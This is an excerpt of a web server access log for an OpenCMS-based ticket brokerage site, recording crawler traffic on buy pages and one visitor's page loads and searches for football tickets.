47.128.25.30 - - [28/Jun/2024:03:38:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
52.70.240.171 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/it/buy/?catid=3B549160-8B9C-E872-44A9-20FEA86B30E8&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83418
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
216.244.66.196 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=0704BD6D-31E9-BB79-1A42-1B64AF5D31BB HTTP/1.1" 200 88364
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
66.249.75.96 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.25.30 - - [28/Jun/2024:03:38:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
65.108.227.178 - - [28/Jun/2024:03:38:55 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F8F46E23-7D11-DB64-2DCC-CFF43B2094D4&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:03:38:58 +0200] "GET /ticket2/opencms/it/buy/?catid=97608B80-50C4-18AE-7A82-0413C62E9243&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83417
216.244.66.196 - - [28/Jun/2024:03:39:01 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=BBAFC2BC-085F-5A58-F761-2463D78A6F36 HTTP/1.1" 200 88330
52.70.240.171 - - [28/Jun/2024:03:39:02 +0200] "GET /ticket2/opencms/it/buy/?catid=36394212-F82E-F845-399B-42BED55969CC&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83416
3.224.220.101 - - [28/Jun/2024:03:39:06 +0200] "GET /ticket2/opencms/it/buy/?catid=C48671DB-5AEB-8CE2-928E-38417FFBE085&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83418
5.9.55.228 - - [28/Jun/2024:03:39:10 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9E00FB70-B262-7D95-9558-FFEE9A3EC7E3 HTTP/1.1" 200 88487
23.22.35.162 - - [28/Jun/2024:03:39:10 +0200] "GET /ticket2/opencms/it/buy/?catid=C0DF818C-DB21-6E2E-4056-DB751FFE0C41&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83414
52.70.240.171 - - [28/Jun/2024:03:39:14 +0200] "GET /ticket2/opencms/it/buy/?catid=F03B8ADD-988E-AE6A-8DBA-AF502C691C60&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83428
52.70.240.171 - - [28/Jun/2024:03:39:18 +0200] "GET /ticket2/opencms/it/buy/?catid=5A89E483-58AD-080E-F363-E16CE738916A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83424
47.128.38.21 - - [28/Jun/2024:03:39:18 +0200] "GET /ticket2/opencms/fi/buy/?catid=8C381435-A1E8-94AF-2C58-D133FCA44A31&comcatid=66708183-7480-3365-06BF-DBF60280AB45&page=6 HTTP/1.1" 200 74943
47.128.38.21 - - [28/Jun/2024:03:39:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.21 - - [28/Jun/2024:03:39:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.38.21 - - [28/Jun/2024:03:39:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.38.21 - - [28/Jun/2024:03:39:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.38.21 - - [28/Jun/2024:03:39:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.38.21 - - [28/Jun/2024:03:39:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.38.21 - - [28/Jun/2024:03:39:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/manchester_united/?gad_source=1&gclid=EAIaIQobChMI0cqc1Zb9hgMVJJeDBx1Y5Q2lEAAYAyAAEgKb7vD_BwE HTTP/1.1" 200 87231
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
95.202.79.248 - - [28/Jun/2024:03:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/team/premier_league/manchester_united.png HTTP/1.1" 200 13884
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
3.224.220.101 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/it/buy/?catid=061607E6-22B7-6FFA-03FD-A4B8B13A943F&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83420
95.202.79.248 - - [28/Jun/2024:03:39:22 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.202.79.248 - - [28/Jun/2024:03:39:23 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
95.202.79.248 - - [28/Jun/2024:03:39:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:39:26 +0200] "GET /ticket2/opencms/it/buy/?catid=7EF04817-972D-18B1-F941-DE800D088075&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83427
5.9.55.228 - - [28/Jun/2024:03:39:27 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9EA63819-F5C6-0A09-AF16-0D985EE0DC58 HTTP/1.1" 200 86947
23.22.35.162 - - [28/Jun/2024:03:39:30 +0200] "GET /ticket2/opencms/it/buy/?catid=06324577-7173-BAB0-146D-E644C912F7C1&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83422
66.249.76.161 - - [28/Jun/2024:03:39:33 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=BF02E8D3-250D-1BB9-F307-8D142E1902AE HTTP/1.1" 200 86534
3.224.220.101 - - [28/Jun/2024:03:39:34 +0200] "GET /ticket2/opencms/it/buy/?catid=E961462E-5AC2-64D6-5850-A310C9DEAA06&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83425
65.108.227.178 - - [28/Jun/2024:03:39:35 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F8F46E23-7D11-DB64-2DCC-CFF43B2094D4&sortorder=asc&column=row HTTP/1.1" 404 -
52.167.144.140 - - [28/Jun/2024:03:39:35 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=8D916C6C-0A69-41F7-4678-427710F013C6 HTTP/1.1" 200 88365
47.128.62.59 - - [28/Jun/2024:03:39:36 +0200] "GET /ticket2/opencms/fi/buy/?catid=465306FD-802C-5175-10FF-40E426DD2769&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77116
47.128.62.59 - - [28/Jun/2024:03:39:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.62.59 - - [28/Jun/2024:03:39:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.62.59 - - [28/Jun/2024:03:39:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.62.59 - - [28/Jun/2024:03:39:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.62.59 - - [28/Jun/2024:03:39:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.62.59 - - [28/Jun/2024:03:39:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.62.59 - - [28/Jun/2024:03:39:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
23.22.35.162 - - [28/Jun/2024:03:39:39 +0200] "GET /ticket2/opencms/it/buy/?catid=7BADFFFB-57C5-5DBC-E7EB-B45075B3D8F9&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83426
23.22.35.162 - - [28/Jun/2024:03:39:42 +0200] "GET /ticket2/opencms/it/buy/?catid=2FC3D548-EAF9-1354-0CD2-7D7619DA2334&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83413
47.128.119.199 - - [28/Jun/2024:03:39:44 +0200] "GET /ticket2/opencms/fi/buy/?catid=9457695E-36ED-A63E-7A88-32963954E2C7&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=6 HTTP/1.1" 200 78258
5.9.55.228 - - [28/Jun/2024:03:39:45 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9EB6A254-5786-FAE4-D689-87650556B208 HTTP/1.1" 200 86778
3.224.220.101 - - [28/Jun/2024:03:39:46 +0200] "GET /ticket2/opencms/it/buy/?catid=6BD6E0B0-84AF-3A0D-3851-C1357CE9B771&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83423
47.128.119.199 - - [28/Jun/2024:03:39:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.119.199 - - [28/Jun/2024:03:39:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.119.199 - - [28/Jun/2024:03:39:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.119.199 - - [28/Jun/2024:03:39:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.119.199 - - [28/Jun/2024:03:39:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.119.199 - - [28/Jun/2024:03:39:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.119.199 - - [28/Jun/2024:03:39:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
23.22.35.162 - - [28/Jun/2024:03:39:51 +0200] "GET /ticket2/opencms/it/buy/?catid=08F27F2A-1872-A39F-A97C-63093E77B18A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83413
3.224.220.101 - - [28/Jun/2024:03:39:54 +0200] "GET /ticket2/opencms/it/buy/?catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83413
3.224.220.101 - - [28/Jun/2024:03:39:58 +0200] "GET /ticket2/opencms/it/buy/?catid=E92E6B1B-7CD1-74B1-312C-265A7D8125D0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83419
5.9.55.228 - - [28/Jun/2024:03:40:00 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9F204847-C811-936E-4B8D-981865300B46 HTTP/1.1" 200 87148
3.224.220.101 - - [28/Jun/2024:03:40:02 +0200] "GET /ticket2/opencms/it/buy/?catid=A3372871-3019-08B8-80CE-74B78F441ACA&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 84078
65.108.227.178 - - [28/Jun/2024:03:40:05 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=FAA7165D-A922-1603-AEA2-82846AE794CA&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:03:40:06 +0200] "GET /ticket2/opencms/it/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 241967
47.128.59.143 - - [28/Jun/2024:03:40:07 +0200] "GET /ticket2/opencms/fi/buy/?catid=24AC1CA6-1C09-0BE5-C04A-9DCCDB15D5E9&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83450
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/sv/search.html?searchQuery=Barcelona&submit= HTTP/1.1" 200 93540
47.128.59.143 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/anniversary_logo_bl.png HTTP/1.1" 200 14743
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/right_side_bar/fi/facebook.png HTTP/1.1" 200 2017
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/right_side_bar/fi/instagram.png HTTP/1.1" 200 2709
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2950
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
95.202.79.248 - - [28/Jun/2024:03:40:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.202.79.248 - - [28/Jun/2024:03:40:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232
95.202.79.248 - - [28/Jun/2024:03:40:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232
95.202.79.248 - - [28/Jun/2024:03:40:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66
23.22.35.162 - - [28/Jun/2024:03:40:10 +0200] "GET /ticket2/opencms/it/buy/?catid=A4D9EA9A-192D-0274-BF26-9C98D8B902AB&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83413
47.128.59.143 - - [28/Jun/2024:03:40:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.59.143 - - [28/Jun/2024:03:40:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.59.143 - - [28/Jun/2024:03:40:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.59.143 - - [28/Jun/2024:03:40:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.59.143 - - [28/Jun/2024:03:40:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.59.143 - - [28/Jun/2024:03:40:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
52.70.240.171 - - [28/Jun/2024:03:40:14 +0200] "GET /ticket2/opencms/it/buy/?catid=BF886BAE-FC84-8CB3-A193-6DFA251F7985&comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 75591
5.9.55.228 - - [28/Jun/2024:03:40:17 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=99E4E057-784A-91C1-7B12-45802B1F86CF HTTP/1.1" 200 86767
66.249.76.160 - - [28/Jun/2024:03:40:17 +0200] "GET /ticket2/opencms/venue/agr.png HTTP/1.1" 200 180543
3.224.220.101 - - [28/Jun/2024:03:40:18 +0200] "GET /ticket2/opencms/it/buy/?catid=36DC4BE2-91A2-6146-2BE9-47B6F3C44EDB&comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 75583
147.185.132.72 - - [28/Jun/2024:03:40:21 +0200] "GET / HTTP/1.0" 404 -
3.224.220.101 - - [28/Jun/2024:03:40:22 +0200] "GET /ticket2/opencms/it/buy/?catid=E03F2203-3943-A0F0-A47D-D9E7CDA79C6B&comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 75605
52.70.240.171 - - [28/Jun/2024:03:40:26 +0200] "GET /ticket2/opencms/it/buy/?catid=A34BCF61-E19C-5C5C-445E-06F3749E1EF4&comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 75596
47.128.55.193 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/fi/buy/?catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83451
47.128.54.183 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/no/buy/?edid=5FDB0F24-0C6F-483A-29C3-00DD28FFC972 HTTP/1.1" 200 72905
95.202.79.248 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/sv/search.html?searchQuery=Tottenham&submit= HTTP/1.1" 200 119033
52.70.240.171 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/it/buy/?catid=465306FD-802C-5175-10FF-40E426DD2769&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77076
95.202.79.248 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
